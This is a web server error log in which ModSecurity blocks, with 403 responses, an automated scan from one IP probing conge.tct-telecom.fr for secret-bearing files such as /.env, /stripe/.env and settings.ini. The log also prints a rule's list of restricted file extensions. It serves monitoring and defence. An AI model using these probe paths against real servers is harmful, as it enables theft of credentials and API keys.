[Mon May 11 20:56:03.885519 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImQ_jVc-A-CSptvm1x1wAAAFU"]
[Mon May 11 20:56:03.885732 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImQ_jVc-A-CSptvm1x1wAAAFU"]
[Mon May 11 20:56:03.885956 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/api/.env"] [unique_id "agImQ_jVc-A-CSptvm1x1wAAAFU"]
[Mon May 11 20:56:03.914190 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTRAAAAUY"]
[Mon May 11 20:56:03.914365 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTRAAAAUY"]
[Mon May 11 20:56:03.914565 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTRAAAAUY"]
[Mon May 11 20:56:03.941193 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImQzP5Q_-MBliRCAxn5gAAAAI"]
[Mon May 11 20:56:03.941516 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImQzP5Q_-MBliRCAxn5gAAAAI"]
[Mon May 11 20:56:03.941738 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImQzP5Q_-MBliRCAxn5gAAAAI"]
[Mon May 11 20:56:04.039478 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTRwAAAVU"]
[Mon May 11 20:56:04.039644 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTRwAAAVU"]
[Mon May 11 20:56:04.039816 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTRwAAAVU"]
[Mon May 11 20:56:04.074084 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImRPjVc-A-CSptvm1x2wAAAFE"]
[Mon May 11 20:56:04.074262 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImRPjVc-A-CSptvm1x2wAAAFE"]
[Mon May 11 20:56:04.074434 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImRPjVc-A-CSptvm1x2wAAAFE"]
[Mon May 11 20:56:04.197796 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImRDP5Q_-MBliRCAxn6wAAABg"]
[Mon May 11 20:56:04.197959 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImRDP5Q_-MBliRCAxn6wAAABg"]
[Mon May 11 20:56:04.198133 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImRDP5Q_-MBliRCAxn6wAAABg"]
[Mon May 11 20:56:04.215462 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImRDP5Q_-MBliRCAxn7AAAABg"]
[Mon May 11 20:56:04.215644 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImRDP5Q_-MBliRCAxn7AAAABg"]
[Mon May 11 20:56:04.215826 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImRDP5Q_-MBliRCAxn7AAAABg"]
[Mon May 11 20:56:04.216027 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTSwAAAVM"]
[Mon May 11 20:56:04.216214 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTSwAAAVM"]
[Mon May 11 20:56:04.216451 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImRNeaRXe5lR8y0ZOTSwAAAVM"]
[Mon May 11 20:56:04.251512 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImRCMeXtzav-mi9Syx8QAAAMo"]
[Mon May 11 20:56:04.251738 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImRCMeXtzav-mi9Syx8QAAAMo"]
[Mon May 11 20:56:04.251943 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImRCMeXtzav-mi9Syx8QAAAMo"]
[Mon May 11 20:56:04.265417 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImRFNddpkriGUb6ZV3BAAAARg"]
[Mon May 11 20:56:04.265685 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImRFNddpkriGUb6ZV3BAAAARg"]
[Mon May 11 20:56:04.265920 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/services/environments.ini"] [unique_id "agImRFNddpkriGUb6ZV3BAAAARg"]
[Mon May 11 20:56:04.413379 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImRJYn-x0CHsbEbP2t9wAAAIo"]
[Mon May 11 20:56:04.413605 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImRJYn-x0CHsbEbP2t9wAAAIo"]
[Mon May 11 20:56:04.413819 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImRJYn-x0CHsbEbP2t9wAAAIo"]
[Mon May 11 20:56:05.137864 2026] [proxy_fcgi:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:05.166729 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTVwAAAUY"]
[Mon May 11 20:56:05.166951 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTVwAAAUY"]
[Mon May 11 20:56:05.167148 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTVwAAAUY"]
[Mon May 11 20:56:05.315922 2026] [ssl:error] [pid 1511173:tid 1511195] (EAI 2)Name or service not known: [client 8.217.28.237:21763] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:56:05.315953 2026] [ssl:error] [pid 1511173:tid 1511195] AH01941: stapling_renew_response: responder error
[Mon May 11 20:56:05.661679 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTWgAAAVM"]
[Mon May 11 20:56:05.661902 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTWgAAAVM"]
